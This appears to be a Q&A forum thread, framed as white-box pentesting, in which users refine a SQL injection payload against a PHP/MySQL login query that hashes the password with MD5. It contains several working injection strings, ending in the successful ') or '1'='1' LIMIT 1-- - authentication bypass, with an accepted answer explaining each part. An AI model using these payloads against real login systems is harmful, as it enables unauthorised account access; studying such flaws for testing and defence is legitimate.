# Adding conditions after LIMIT in MySQL

Tags: sql-injection, mysql

Is there any way to add any condition after LIMIT for example the *OR* or *AND*?

I am wondering if we can add any query after LIMIT which returns nothing.

for example the query is:

```
SELECT * FROM table WHERE email = '$email' AND pwd = MD5('$pwd');
```

and after sql injection the query would be:

```
SELECT * FROM table WHERE email = '$email' AND pwd = MD5('') or 1 limit 1;
```

Comment: I don't understand the point to search for add `OR` or `AND` statement after a `LIMIT` statement thus you can already do everything into the `WHERE`. Please be more specific.

Comment: i just wanted to inject the query in the password field which is converted to MD5() which means that i wanted to inject the query like this
**') or 1 limit 1**
but the problem is in php:
php query is 
**$login = "SELECT fName,lName FROM register WHERE email = '$email' AND pwd = MD5('$pwd')";**

. It gives the error that the ') is missing! So i am thinking to add any condition or query to remove that error!

Comment: Isn't `SELECT * FROM table WHERE email = '$email' AND pwd = MD5('') or 1;-- ` enough ?
Your getting this error because at the end, your query like you do look like this one :

`SELECT fName,lName FROM register WHERE email = '$email' AND pwd = MD5('') or 1 limit 1; ')` which is wong. Use the mysql comment (`--`) to escape the end of the query

Comment: @Xavier59 yeah! you understood what i am saying exactly! The comments ***--*** and  /*   is also giving the error in the query!
The query **$exe = select * from table where email='$email' and pwd=MD5('$pwd')** is not enough because after executing the query, because **mysqli_num_rows($exe)** gives the number greater then 0  so the condition get false due to multiple rows selected. **Thats why i limited it to 1.**

Comment: `SELECT * FROM table WHERE email = '$email' AND pwd = MD5('') or 1 limit 1;-- ` should work. Make sure you let a space after the mysql comment : `-- `. There is no reason for this query to still returnan error.

Comment: @Xavier59 i tried it but its giving error => **You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--')' at line 1**

Comment: Use This, `')+1'OR'+1'='1 --+` or `')+1'OR'+1'='1 limit 1 --+` or `')+1'OR'+1'='1 #` .. And if Error Comes tell me exact error, because as per what i think the Previous statement you wrote , you got syntax error at `--')` That means they are Breaking your Query.. @NITIN .. BTW Treat those + sign as Space, otherwise MD5 will encode that as Character..

Comment: yeah! you are right @GerorgeTimber its giving syntax error at --').
But after executing your query it still gives error i.e. **You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''OR'+1'='1 --+ or ')+1'OR'+1'='1 limit 1 --+ or ')+1'OR'+1'='1 #')' at line 1**

Comment: Friend @NITIN Actually i gave you three separate Queries for Injection, The one's in grey highlight are single query , Don't copy and paste three query at same time ... It is like 1st one is `')+1'OR'+1'='1 --+` 2nd one is `')+1'OR'+1'='1 limit 1 --+` and 3rd one is `')+1'OR'+1'='1 #` And if you are trying in input fields make sure you use space instead of + sign  so Query would be `') 1'OR' 1'='1 --+` , another one would be `') 1'OR' 1'='1 limit 1 --+` Note that all are **separate** . I am just tellin you to try 3 queries one after another and Give me Syntax error if occurs

Comment: @GerorgeTimber 1 => **You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 'OR' 1 '=' 1 -- ')' at line 1** and
2 => **You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 'OR' 1 '=' 1 limit 1 --')' at line 1** and
3 => **You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 'OR' 1 '=' 1 #')' at line 1**

Comment: If it's a White Box Pentesting, could you provide the Complete code of the Page? @NITIN Would like to test locally

Comment: @GerorgeTimber sure! 
http://pastebin.com/hWRMs78K

Comment: Hello @NITIN , Try this as payload `') or '1'='1' LIMIT 1-- -` and let me know ....

Comment: @GerorgeTimber **woah!** Thanks for your help mate. This is working!. Could you explain me in the answer section why you added this **-** in the end? :)

Comment: Good to hear that :) @NITIN, Explanation is answered in the `Answers` Section..

Answer (score 1, accepted):

This question has been answered in the comment Section, But this is a explanatory Answer for anyone who wants to look at. So, Looking at Code snippet we could actually see

```
$login = "SELECT fName,lName FROM great WHERE email= '$email' AND pwd = MD5('$pwd')";
```

As you can see on the `pwd = MD5('$pwd')` at the end, the Code actually takes a User Inputted Password converts it into MD5 and than compares into the Database. Now, the Plan is to breakout of the `pwd` in the MYSQL Query.
For that, the `')` could be supplied so it would look like `pwd = MD5('')')` in this case the last `')` is of no Use and it would give SQL Syntax Error as the Query won't identify two `')')`  So our next Plan is to comment the last `')` out of the Query, for that i had used the Typical Two Hyphens `-- -` . Now the Magic here is if you supply only `--` than the Query at end won't get commented out because it would result into `--')` Giving you a Syntax Error ! So for that reason, i supplied Intentional space after `--` and added another hyphen for demonstration. Because in Many Blackbox SQL Injection cases, you couldn't predict and Exact Syntax error is the only hope, so in this `-- -` comment the last Hyphen has really no significance but the **SPACE** between them holds the key to comment `')` out from the back .

Now, The query would work as usual and Due to lack of Input Sanitisation we can Always TRUE the query by `or '1'='1'` . But, that alone won't solve issue as the `or '1'='1'` would select Every ROW from the database and the code snippet given below does a Additional Check here

```
            if($exe){
            $num = mysqli_num_rows($exe);
            if($num == 1){
                  //You are in
                }
```

Aha, Now mysqli_num_rows > 1 Which would not let you go to the `if` part and You would not bypass. So in the Initial Payload, that is the sole reason we are Adding `LIMIT 1` to avoiding our rows > 1 .The `LIMIT 1` would select first row of their Back-End Database and VOILA you are through.

So Joining all these small pieces, we could construct our Final Payload as `') or '1'='1' LIMIT 1-- -`  Hence Final Query would be

```
 $login = "SELECT fName,lName FROM great WHERE email= '$email' AND pwd = MD5('') or '1'='1' LIMIT 1-- -')";
```

That's it ..! :)

Comment: @George Timber is there any payload to bypass the **mysqli_real_escape_string($conn, MD5($_POST['pwd']))** ? Because the query is converted into MD5 hash.